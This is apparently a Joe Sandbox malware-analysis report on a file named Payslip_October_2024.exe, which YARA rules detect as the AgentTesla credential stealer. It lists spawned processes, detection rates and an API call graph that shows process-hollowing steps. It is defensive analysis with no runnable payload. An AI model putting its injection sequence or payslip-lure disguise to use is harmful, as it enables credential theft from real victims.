                                                                                                          Commandline:"C:\Users\user\Desktop\Payslip_October_2024.exe"
                                                                                                          Imagebase:0x5a0000
                                                                                                          File size:800'256 bytes
                                                                                                          MD5 hash:A0DADB7997E2B13144275B1C164F1C84
                                                                                                          Has elevated privileges:true
                                                                                                          Has administrator privileges:true
                                                                                                          Programmed in:C, C++ or other language
                                                                                                          Yara matches:
                                                                                                          • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000002.00000002.4125026006.0000000002C4C000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                          • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000002.4125026006.0000000002C21000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                          • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000002.00000002.4125026006.0000000002C21000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                          Reputation:low
                                                                                                          Has exited:false

                                                                                                          General

                                                                                                          Target ID:3
                                                                                                          Start time:15:25:06
                                                                                                          Start date:04/11/2024
                                                                                                          Path:C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe
                                                                                                          Wow64 process (32bit):true
                                                                                                          Commandline:"C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe"
                                                                                                          Imagebase:0x470000
                                                                                                          File size:800'256 bytes
                                                                                                          MD5 hash:A0DADB7997E2B13144275B1C164F1C84
                                                                                                          Has elevated privileges:false
                                                                                                          Has administrator privileges:false
                                                                                                          Programmed in:C, C++ or other language
                                                                                                          Antivirus matches:
                                                                                                          • Detection: 100%, Joe Sandbox ML
                                                                                                          • Detection: 32%, ReversingLabs
                                                                                                          Reputation:low
                                                                                                          Has exited:true

                                                                                                          General

                                                                                                          Target ID:4
                                                                                                          Start time:15:25:07
                                                                                                          Start date:04/11/2024
                                                                                                          Path:C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe
                                                                                                          Wow64 process (32bit):false
                                                                                                          Commandline:"C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe"
                                                                                                          Imagebase:0x1b0000
                                                                                                          File size:800'256 bytes
                                                                                                          MD5 hash:A0DADB7997E2B13144275B1C164F1C84
                                                                                                          Has elevated privileges:false
                                                                                                          Has administrator privileges:false
                                                                                                          Programmed in:C, C++ or other language
                                                                                                          Reputation:low
                                                                                                          Has exited:true

                                                                                                          General

                                                                                                          Target ID:5
                                                                                                          Start time:15:25:07
                                                                                                          Start date:04/11/2024
                                                                                                          Path:C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe
                                                                                                          Wow64 process (32bit):true
                                                                                                          Commandline:"C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe"
                                                                                                          Imagebase:0x7b0000
                                                                                                          File size:800'256 bytes
                                                                                                          MD5 hash:A0DADB7997E2B13144275B1C164F1C84
                                                                                                          Has elevated privileges:false
                                                                                                          Has administrator privileges:false
                                                                                                          Programmed in:C, C++ or other language
                                                                                                          Yara matches:
                                                                                                          • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000005.00000002.1889661399.0000000002B91000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                          • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000005.00000002.1889661399.0000000002B91000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                          • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000005.00000002.1889661399.0000000002BBC000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                          • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000005.00000002.1886245023.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                          • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000005.00000002.1886245023.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                          Reputation:low
                                                                                                          Has exited:true

                                                                                                          General

                                                                                                          Target ID:7
                                                                                                          Start time:15:25:14
                                                                                                          Start date:04/11/2024
                                                                                                          Path:C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe
                                                                                                          Wow64 process (32bit):true
                                                                                                          Commandline:"C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe"
                                                                                                          Imagebase:0x570000
                                                                                                          File size:800'256 bytes
                                                                                                          MD5 hash:A0DADB7997E2B13144275B1C164F1C84
                                                                                                          Has elevated privileges:false
                                                                                                          Has administrator privileges:false
                                                                                                          Programmed in:C, C++ or other language
                                                                                                          Reputation:low
                                                                                                          Has exited:true

                                                                                                          General

                                                                                                          Target ID:8
                                                                                                          Start time:15:25:15
                                                                                                          Start date:04/11/2024
                                                                                                          Path:C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe
                                                                                                          Wow64 process (32bit):true
                                                                                                          Commandline:"C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe"
                                                                                                          Imagebase:0x7b0000
                                                                                                          File size:800'256 bytes
                                                                                                          MD5 hash:A0DADB7997E2B13144275B1C164F1C84
                                                                                                          Has elevated privileges:false
                                                                                                          Has administrator privileges:false
                                                                                                          Programmed in:C, C++ or other language
                                                                                                          Yara matches:
                                                                                                          • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000008.00000002.4124052676.0000000002C2C000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                          • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000008.00000002.4124052676.0000000002C01000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                          • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000008.00000002.4124052676.0000000002C01000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                          Reputation:low
                                                                                                          Has exited:false

                                                                                                          Disassembly

                                                                                                          Reset < >

                                                                                                            Execution Graph

                                                                                                            Execution Coverage:11.1%
                                                                                                            Dynamic/Decrypted Code Coverage:100%
                                                                                                            Signature Coverage:4.3%
                                                                                                            Total number of Nodes:256
                                                                                                            Total number of Limit Nodes:15
                                                                                                            execution_graph 28697 130e930 DuplicateHandle 28698 130e9c6 28697->28698 28717 130e2e0 28718 130e326 GetCurrentProcess 28717->28718 28720 130e371 28718->28720 28721 130e378 GetCurrentThread 28718->28721 28720->28721 28722 130e3b5 GetCurrentProcess 28721->28722 28723 130e3ae 28721->28723 28724 130e3eb GetCurrentThreadId 28722->28724 28723->28722 28726 130e444 28724->28726 28978 74a01b8 28979 74a01f2 28978->28979 28980 74a0283 28979->28980 28984 74a02a0 28979->28984 28989 74a02b0 28979->28989 28981 74a0279 28985 74a0735 28984->28985 28986 74a02de 28984->28986 28985->28981 28986->28985 28994 74a0bc8 28986->28994 29002 74a0bd8 28986->29002 28990 74a0735 28989->28990 28991 74a02de 28989->28991 28990->28981 28991->28990 28992 74a0bc8 2 API calls 28991->28992 28993 74a0bd8 2 API calls 28991->28993 28992->28990 28993->28990 28995 74a0bd8 28994->28995 29000 74a0bc8 CreateIconFromResourceEx 28995->29000 29001 74a0bd8 CreateIconFromResourceEx 28995->29001 28996 74a0bf2 28997 74a0bff 28996->28997 28998 74a0c17 CreateIconFromResourceEx 28996->28998 28997->28985 28999 74a0ca6 28998->28999 28999->28985 29000->28996 29001->28996 29007 74a0bc8 CreateIconFromResourceEx 29002->29007 29008 74a0bd8 CreateIconFromResourceEx 29002->29008 29003 74a0bf2 29004 74a0bff 29003->29004 29005 74a0c17 CreateIconFromResourceEx 29003->29005 29004->28985 29006 74a0ca6 29005->29006 29006->28985 29007->29003 29008->29003 29009 e58052e 29010 e58053e 29009->29010 29012 e582c08 ResumeThread 29010->29012 29013 e582bf8 ResumeThread 29010->29013 29011 e580571 29012->29011 29013->29011 28727 1304668 28728 130467a 28727->28728 28729 1304686 28728->28729 28733 1304771 28728->28733 28738 1304204 28729->28738 28731 130469c 28734 1304795 28733->28734 28742 1304880 28734->28742 28746 1304871 28734->28746 28739 130420f 28738->28739 28754 130612c 28739->28754 28741 1306a89 28741->28731 28744 13048a7 28742->28744 28743 1304984 28744->28743 28750 13044e4 28744->28750 28748 13048a7 28746->28748 28747 1304984 28748->28747 28749 13044e4 CreateActCtxA 28748->28749 28749->28747 28751 1305910 CreateActCtxA 28750->28751 28753 13059d3 28751->28753 28753->28753 28755 1306137 28754->28755 28758 130662c 28755->28758 28757 13075d5 28757->28741 28759 1306637 28758->28759 28762 130665c 28759->28762 28761 13076ba 28761->28757 28763 1306667 28762->28763 28766 130668c 28763->28766 28765 13077bc 28765->28761 28767 1306697 28766->28767 28768 130965b 28767->28768 28770 130bf19 28767->28770 28768->28765 28774 130bf50 28770->28774 28777 130bf3f 28770->28777 28771 130bf2e 28771->28768 28781 130c038 28774->28781 28775 130bf5f 28775->28771 28778 130bf4d 28777->28778 28780 130c038 GetModuleHandleW 28778->28780 28779 130bf5f 28779->28771 28780->28779 28783 130c045 28781->28783 28782 130c07c 28782->28775 28783->28782 28784 130c280 GetModuleHandleW 28783->28784 28785 130c2ad 28784->28785 28785->28775 28786 e585470 28787 e5855fb 28786->28787 28788 e585496 28786->28788 28788->28787 28792 e5856eb 28788->28792 28795 e585780 28788->28795 28798 e5856f0 28788->28798 28793 e585714 PostMessageW 28792->28793 28794 e58575c 28793->28794 28794->28788 28796 e585714 PostMessageW 28795->28796 28797 e58575c 28796->28797 28797->28788 28799 e585714 PostMessageW 28798->28799 28800 e58575c 28799->28800 28800->28788 29014 130e1c8 29015 130e1d5 29014->29015 29016 130e20f 29015->29016 29018 130cd70 29015->29018 29019 130cd7b 29018->29019 29021 130ef28 29019->29021 29022 130e574 29019->29022 29023 130e57f 29022->29023 29024 130668c GetModuleHandleW 29023->29024 29025 130ef97 29024->29025 29025->29021 28699 e580192 28700 e5801a6 28699->28700 28704 e582c08 28700->28704 28708 e582bf8 28700->28708 28701 e5801cd 28705 e582c3b 28704->28705 28706 e582ca9 28705->28706 28712 e582ff0 28705->28712 28706->28701 28709 e582c08 28708->28709 28710 e582ca9 28709->28710 28711 e582ff0 ResumeThread 28709->28711 28710->28701 28711->28710 28713 e582fae 28712->28713 28714 e582ff6 ResumeThread 28712->28714 28713->28706 28716 e583069 28714->28716 28716->28706 28801 e583a33 28805 e584268 28801->28805 28824 e5841d8 28801->28824 28802 e583a42 28806 e584282 28805->28806 28807 e5842a6 28806->28807 28843 e58497b 28806->28843 28848 e584845 28806->28848 28853 e584704 28806->28853 28857 e584d8f 28806->28857 28862 e58484e 28806->28862 28866 e58478e 28806->28866 28871 e584dee 28806->28871 28876 e584b2d 28806->28876 28881 e584aeb 28806->28881 28890 e584af6 28806->28890 28895 e5849d0 28806->28895 28900 e584c9f 28806->28900 28905 e5847de 28806->28905 28910 e58465e 28806->28910 28914 e584a1d 28806->28914 28919 e5846dc 28806->28919 28807->28802 28825 e584254 28824->28825 28826 e5841e6 28824->28826 28825->28826 28827 e58497b 2 API calls 28825->28827 28828 e5846dc 2 API calls 28825->28828 28829 e584a1d 2 API calls 28825->28829 28830 e58465e 2 API calls 28825->28830 28831 e5847de 2 API calls 28825->28831 28832 e584c9f 2 API calls 28825->28832 28833 e5849d0 2 API calls 28825->28833 28834 e584af6 2 API calls 28825->28834 28835 e584aeb 4 API calls 28825->28835 28836 e584b2d 2 API calls 28825->28836 28837 e584dee 2 API calls 28825->28837 28838 e58478e 2 API calls 28825->28838 28839 e58484e 2 API calls 28825->28839 28840 e584d8f 2 API calls 28825->28840 28841 e584704 2 API calls 28825->28841 28842 e584845 2 API calls 28825->28842 28826->28802 28827->28826 28828->28826 28829->28826 28830->28826 28831->28826 28832->28826 28833->28826 28834->28826 28835->28826 28836->28826 28837->28826 28838->28826 28839->28826 28840->28826 28841->28826 28842->28826 28844 e5849e2 28843->28844 28845 e5847f2 28843->28845 28924 e5830a8 28844->28924 28928 e5830a1 28844->28928 28845->28807 28849 e5847f2 28848->28849 28850 e58484f 28848->28850 28849->28807 28850->28849 28932 e583328 28850->28932 28936 e583330 28850->28936 28940 e583238 28853->28940 28944 e583240 28853->28944 28854 e5846c4 28854->28807 28858 e584d9e 28857->28858 28859 e584df1 28858->28859 28860 e5830a8 Wow64SetThreadContext 28858->28860 28861 e5830a1 Wow64SetThreadContext 28858->28861 28860->28858 28861->28858 28864 e583328 ReadProcessMemory 28862->28864 28865 e583330 ReadProcessMemory 28862->28865 28863 e5847f2 28863->28807 28864->28863 28865->28863 28867 e584f87 28866->28867 28869 e583238 WriteProcessMemory 28867->28869 28870 e583240 WriteProcessMemory 28867->28870 28868 e584fab 28869->28868 28870->28868 28872 e584dab 28871->28872 28873 e584df1 28871->28873 28872->28871 28874 e5830a8 Wow64SetThreadContext 28872->28874 28875 e5830a1 Wow64SetThreadContext 28872->28875 28874->28872 28875->28872 28877 e584b33 28876->28877 28948 e5853f0 28877->28948 28953 e5853ef 28877->28953 28878 e584b5e 28882 e584b53 28881->28882 28885 e584a3b 28881->28885 28883 e584b5e 28882->28883 28886 e5853ef 2 API calls 28882->28886 28887 e5853f0 2 API calls 28882->28887 28884 e585068 28884->28807 28885->28884 28888 e583238 WriteProcessMemory 28885->28888 28889 e583240 WriteProcessMemory 28885->28889 28886->28883 28887->28883 28888->28885 28889->28885 28891 e584b03 28890->28891 28892 e584b5e 28891->28892 28893 e5853ef 2 API calls 28891->28893 28894 e5853f0 2 API calls 28891->28894 28892->28892 28893->28892 28894->28892 28896 e5849e2 28895->28896 28898 e5830a8 Wow64SetThreadContext 28896->28898 28899 e5830a1 Wow64SetThreadContext 28896->28899 28897 e5849ea 28898->28897 28899->28897 28902 e584a3b 28900->28902 28901 e585068 28901->28807 28902->28900 28902->28901 28903 e583238 WriteProcessMemory 28902->28903 28904 e583240 WriteProcessMemory 28902->28904 28903->28902 28904->28902 28906 e5847e1 28905->28906 28907 e5847f2 28906->28907 28908 e583328 ReadProcessMemory 28906->28908 28909 e583330 ReadProcessMemory 28906->28909 28907->28807 28908->28907 28909->28907 28962 e5834c8 28910->28962 28966 e5834bc 28910->28966 28916 e584a23 28914->28916 28915 e585068 28915->28807 28916->28915 28917 e583238 WriteProcessMemory 28916->28917 28918 e583240 WriteProcessMemory 28916->28918 28917->28916 28918->28916 28920 e5846ee 28919->28920 28970 e583178 28920->28970 28974 e583180 28920->28974 28921 e584fe8 28925 e5830ed Wow64SetThreadContext 28924->28925 28927 e583135 28925->28927 28927->28845 28929 e5830ed Wow64SetThreadContext 28928->28929 28931 e583135 28929->28931 28931->28845 28933 e58337b ReadProcessMemory 28932->28933 28935 e5833bf 28933->28935 28935->28849 28937 e58337b ReadProcessMemory 28936->28937 28939 e5833bf 28937->28939 28939->28849 28941 e583288 WriteProcessMemory 28940->28941 28943 e5832df 28941->28943 28943->28854 28945 e583288 WriteProcessMemory 28944->28945 28947 e5832df 28945->28947 28947->28854 28949 e585405 28948->28949 28952 e582ff0 ResumeThread 28949->28952 28958 e582ff8 28949->28958 28950 e585418 28950->28878 28952->28950 28954 e5853f0 28953->28954 28956 e582ff8 ResumeThread 28954->28956 28957 e582ff0 ResumeThread 28954->28957 28955 e585418 28955->28878 28956->28955 28957->28955 28959 e583038 ResumeThread 28958->28959 28961 e583069 28959->28961 28961->28950 28963 e583551 CreateProcessA 28962->28963 28965 e583713 28963->28965 28967 e583551 CreateProcessA 28966->28967 28969 e583713 28967->28969 28971 e5831c0 VirtualAllocEx 28970->28971 28973 e5831fd 28971->28973 28973->28921 28975 e5831c0 VirtualAllocEx 28974->28975 28977 e5831fd 28975->28977 28977->28921

                                                                                                            Executed Functions

                                                                                                            Function 074A02B0 Relevance: 6.9, Strings: 5, Instructions: 618COMMON
                                                                                                            Download Yara Rule

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 527 74a02b0-74a02d8 528 74a07bb-74a0824 527->528 529 74a02de-74a02e3 527->529 535 74a082b-74a08b3 528->535 529->528 530 74a02e9-74a0306 529->530 530->535 536 74a030c-74a0310 530->536 574 74a08be-74a093e 535->574 538 74a031f-74a0323 536->538 539 74a0312-74a031c 536->539 541 74a0332-74a0339 538->541 542 74a0325-74a032f 538->542 539->538 544 74a033f-74a036f 541->544 545 74a0454-74a0459 541->545 542->541 556 74a0b3e-74a0b64 544->556 557 74a0375-74a0448 544->557 549 74a045b-74a045f 545->549 550 74a0461-74a0466 545->550 549->550 552 74a0468-74a046c 549->552 553 74a0478-74a04a8 550->553 552->556 558 74a0472-74a0475 552->558 553->574 575 74a04ae-74a04b1 553->575 566 74a0b66-74a0b72 556->566 567 74a0b74 556->567 557->545 582 74a044a 557->582 558->553 568 74a0b77-74a0b7c 566->568 567->568 590 74a0945-74a09c7 574->590 575->574 577 74a04b7-74a04b9 575->577 577->574 579 74a04bf-74a04f4 577->579 589 74a04fa-74a0503 579->589 579->590 582->545 591 74a0509-74a0563 589->591 592 74a0666-74a066a 589->592 595 74a09cf-74a0a51 590->595 632 74a0575 591->632 633 74a0565-74a056e 591->633 592->595 596 74a0670-74a0674 592->596 599 74a0a59-74a0a86 595->599 598 74a067a-74a0680 596->598 596->599 602 74a0682 598->602 603 74a0684-74a06b9 598->603 611 74a0a8d-74a0b0d 599->611 606 74a06c0-74a06c6 602->606 603->606 610 74a06cc-74a06d4 606->610 606->611 615 74a06db-74a06dd 610->615 616 74a06d6-74a06da 610->616 667 74a0b14-74a0b36 611->667 621 74a073f-74a0745 615->621 622 74a06df-74a0703 615->622 616->615 625 74a0747-74a0762 621->625 626 74a0764-74a0792 621->626 653 74a070c-74a0710 622->653 654 74a0705-74a070a 622->654 644 74a079a-74a07a6 625->644 626->644 638 74a0579-74a057b 632->638 633->638 640 74a0570-74a0573 633->640 645 74a057d 638->645 646 74a0582-74a0586 638->646 640->638 666 74a07ac-74a07b8 644->666 644->667 645->646 651 74a0588-74a058f 646->651 652 74a0594-74a059a 646->652 663 74a0631-74a0635 651->663 660 74a059c-74a05a2 652->660 661 74a05a4-74a05a9 652->661 653->556 655 74a0716-74a0719 653->655 656 74a071c-74a072d 654->656 655->656 703 74a072f call 74a0bc8 656->703 704 74a072f call 74a0bd8 656->704 668 74a05af-74a05b5 660->668 661->668 664 74a0637-74a0651 663->664 665 74a0654-74a0660 663->665 664->665 665->591 665->592 667->556 671 74a05bb-74a05c0 668->671 672 74a05b7-74a05b9 668->672 678 74a05c2-74a05d4 671->678 672->678 673 74a0735-74a073d 673->644 683 74a05de-74a05e3 678->683 684 74a05d6-74a05dc 678->684 686 74a05e9-74a05f0 683->686 684->686 690 74a05f2-74a05f4 686->690 691 74a05f6 686->691 694 74a05fb-74a0606 690->694 691->694 696 74a062a 694->696 697 74a0608-74a060b 694->697 696->663 697->663 698 74a060d-74a0613 697->698 699 74a061a-74a0623 698->699 700 74a0615-74a0618 698->700 699->663 702 74a0625-74a0628 699->702 700->696 700->699 702->663 702->696 703->673 704->673
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1680965006.00000000074A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074A0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_74a0000_Payslip_October_2024.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: Hbq$Hbq$Hbq$Hbq$Hbq
                                                                                                            • API String ID: 0-1677660839
                                                                                                            • Opcode ID: 3e2a74346ea4c7172f59bbc570a6132e284a53b9f3ab389dd27215cd2a36b561
                                                                                                            • Instruction ID: d6c5e7939701c79e067ad2b95012b27cedf7b3c7e4af6734707c2c9d0b14fc47
                                                                                                            • Opcode Fuzzy Hash: 3e2a74346ea4c7172f59bbc570a6132e284a53b9f3ab389dd27215cd2a36b561
                                                                                                            • Instruction Fuzzy Hash: 30327F74E002189FDB54DFA8C8507AEBBF2BF98300F14816AD449AB395EB349D46CF95
                                                                                                            Function 074A6730 Relevance: .5, Instructions: 511COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1680965006.00000000074A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074A0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_74a0000_Payslip_October_2024.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 1ae9e0ce60dbab93c2938d31cbe5b5591608fdfff76444fc6c480793cc89af79
                                                                                                            • Instruction ID: 6cc474b0c7f01babec08034dd2126691320e68518a46ed34908fe6349c5e5bb1
                                                                                                            • Opcode Fuzzy Hash: 1ae9e0ce60dbab93c2938d31cbe5b5591608fdfff76444fc6c480793cc89af79
                                                                                                            • Instruction Fuzzy Hash: 234290B4E01219CFDB24CFA9C984B9DBBF2BF48300F5581A9E809A7355D734AA81CF51
                                                                                                            Function 074A5460 Relevance: .5, Instructions: 486COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1680965006.00000000074A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074A0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_74a0000_Payslip_October_2024.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 4e4949f2fcbf4395e668341d21b605c0acd6b79d97d87932241873cfac1bc148
                                                                                                            • Instruction ID: f04e1bf1553bad914bfbfa8f60c9c86d6fa714147273ea9c9630a134e1bf44a9
                                                                                                            • Opcode Fuzzy Hash: 4e4949f2fcbf4395e668341d21b605c0acd6b79d97d87932241873cfac1bc148
                                                                                                            • Instruction Fuzzy Hash: F032C1B4901219DFDB54DFA9C680A9EFBB2BF48315F55C19AD408AB311CB30E985CFA0
                                                                                                            Function 0E5868D8 Relevance: .4, Instructions: 396COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1682385509.000000000E580000.00000040.00000800.00020000.00000000.sdmp, Offset: 0E580000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_e580000_Payslip_October_2024.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 2c11aab0449ada679761beb9520cd593fd1b8e1dd17fbe40ede1a61660988bec
                                                                                                            • Instruction ID: b07f46dbaca682a776e0261551a932ee1414e9752ed5b9720bcef8439dd28ebb
                                                                                                            • Opcode Fuzzy Hash: 2c11aab0449ada679761beb9520cd593fd1b8e1dd17fbe40ede1a61660988bec
                                                                                                            • Instruction Fuzzy Hash: 55E1CA70B012058FDB2AEB79C560BAEB7F6BF88704F14886DD145AB294CB75EC01CB51
                                                                                                            Function 074A02A0 Relevance: .3, Instructions: 279COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1680965006.00000000074A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074A0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_74a0000_Payslip_October_2024.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 28e500b7b5cda4bbe9716857ee5b9730f824c9f406ca6dc60bc6d10a8e3a3543
                                                                                                            • Instruction ID: 382cb83538f0fa0a9003fde9b95cdabd5ada4aa26adccfddc2ec04f725b0de02
                                                                                                            • Opcode Fuzzy Hash: 28e500b7b5cda4bbe9716857ee5b9730f824c9f406ca6dc60bc6d10a8e3a3543
                                                                                                            • Instruction Fuzzy Hash: 59C15DB4E002159FDF25CFA5C8807DEBBB2AF98300F14C56AD449AB265E730D985CF91
                                                                                                            Function 074A9A58 Relevance: .1, Instructions: 140COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1680965006.00000000074A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074A0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_74a0000_Payslip_October_2024.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: daab768cca45700eb0391e338ae765dd4c517b8ccb64fce4e37a016165909a86
                                                                                                            • Instruction ID: c4b0594001b75851bd52224434459ca67ca6a3b27d8e8fe05993b43914d9268f
                                                                                                            • Opcode Fuzzy Hash: daab768cca45700eb0391e338ae765dd4c517b8ccb64fce4e37a016165909a86
                                                                                                            • Instruction Fuzzy Hash: 385180B5D012199FDF08CFEAC8856EEFBB6BF89300F10802AE419AB254DB345946CF40
                                                                                                            Function 074AD5E0 Relevance: .1, Instructions: 104COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1680965006.00000000074A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074A0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_74a0000_Payslip_October_2024.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 1c4d94ac571a189f2f6cebfdaac2f22db8bb0875277d582198c3c859a9351fbc
                                                                                                            • Instruction ID: 510511d2011f702af4b76143f19ca5b637c915a2131b2b4c2070fa6f36cf44d1
                                                                                                            • Opcode Fuzzy Hash: 1c4d94ac571a189f2f6cebfdaac2f22db8bb0875277d582198c3c859a9351fbc
                                                                                                            • Instruction Fuzzy Hash: 494127B0E05258DFDB14CFA6C8447EDBBF6BF9A300F10C4AAD409A6255DB744A45CF50
                                                                                                            Function 074A9A49 Relevance: .1, Instructions: 104COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1680965006.00000000074A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074A0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_74a0000_Payslip_October_2024.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: f76dbd5e0bb6a2833ef7e0be0ab1e7cbe47d19c7271ccab8cdcc26b5f886ef6a
                                                                                                            • Instruction ID: e97213eaebce0348d02ebdcc24b1c98cc60e20bd40fe7f3c37f94b3325eec47f
                                                                                                            • Opcode Fuzzy Hash: f76dbd5e0bb6a2833ef7e0be0ab1e7cbe47d19c7271ccab8cdcc26b5f886ef6a
                                                                                                            • Instruction Fuzzy Hash: 5D418FB1E046599FDB08CFAAC8856EEFBF2BF88300F14C16AD419AB254DB345946CF40
                                                                                                            Function 0E584845 Relevance: .0, Instructions: 34COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1682385509.000000000E580000.00000040.00000800.00020000.00000000.sdmp, Offset: 0E580000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_e580000_Payslip_October_2024.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: f8de1121b5dc2e746475ac6d156e6f6d5a07efcaf8e0cad1769f8fff1696be0c
                                                                                                            • Instruction ID: 558ce50c8274c5a73ff49c8b38d688f5b21c4e64c7bea39d2ef1cf6a9acc9255
                                                                                                            • Opcode Fuzzy Hash: f8de1121b5dc2e746475ac6d156e6f6d5a07efcaf8e0cad1769f8fff1696be0c
                                                                                                            • Instruction Fuzzy Hash: A9F0827580A119CFCB60DE55C981BF9B7FCBB4A304F10E895991DB3241C7359E89CB50
                                                                                                            Function 0130E2E0 Relevance: 6.1, APIs: 4, Instructions: 128threadCOMMON
                                                                                                            Download Yara Rule

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 705 130e2e0-130e36f GetCurrentProcess 709 130e371-130e377 705->709 710 130e378-130e3ac GetCurrentThread 705->710 709->710 711 130e3b5-130e3e9 GetCurrentProcess 710->711 712 130e3ae-130e3b4 710->712 714 130e3f2-130e40a 711->714 715 130e3eb-130e3f1 711->715 712->711 717 130e413-130e442 GetCurrentThreadId 714->717 715->714 719 130e444-130e44a 717->719 720 130e44b-130e4ad 717->720 719->720
                                                                                                            APIs
                                                                                                            • GetCurrentProcess.KERNEL32 ref: 0130E35E
                                                                                                            • GetCurrentThread.KERNEL32 ref: 0130E39B
                                                                                                            • GetCurrentProcess.KERNEL32 ref: 0130E3D8
                                                                                                            • GetCurrentThreadId.KERNEL32 ref: 0130E431
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1677851766.0000000001300000.00000040.00000800.00020000.00000000.sdmp, Offset: 01300000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_1300000_Payslip_October_2024.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Current$ProcessThread
                                                                                                            • String ID:
                                                                                                            • API String ID: 2063062207-0
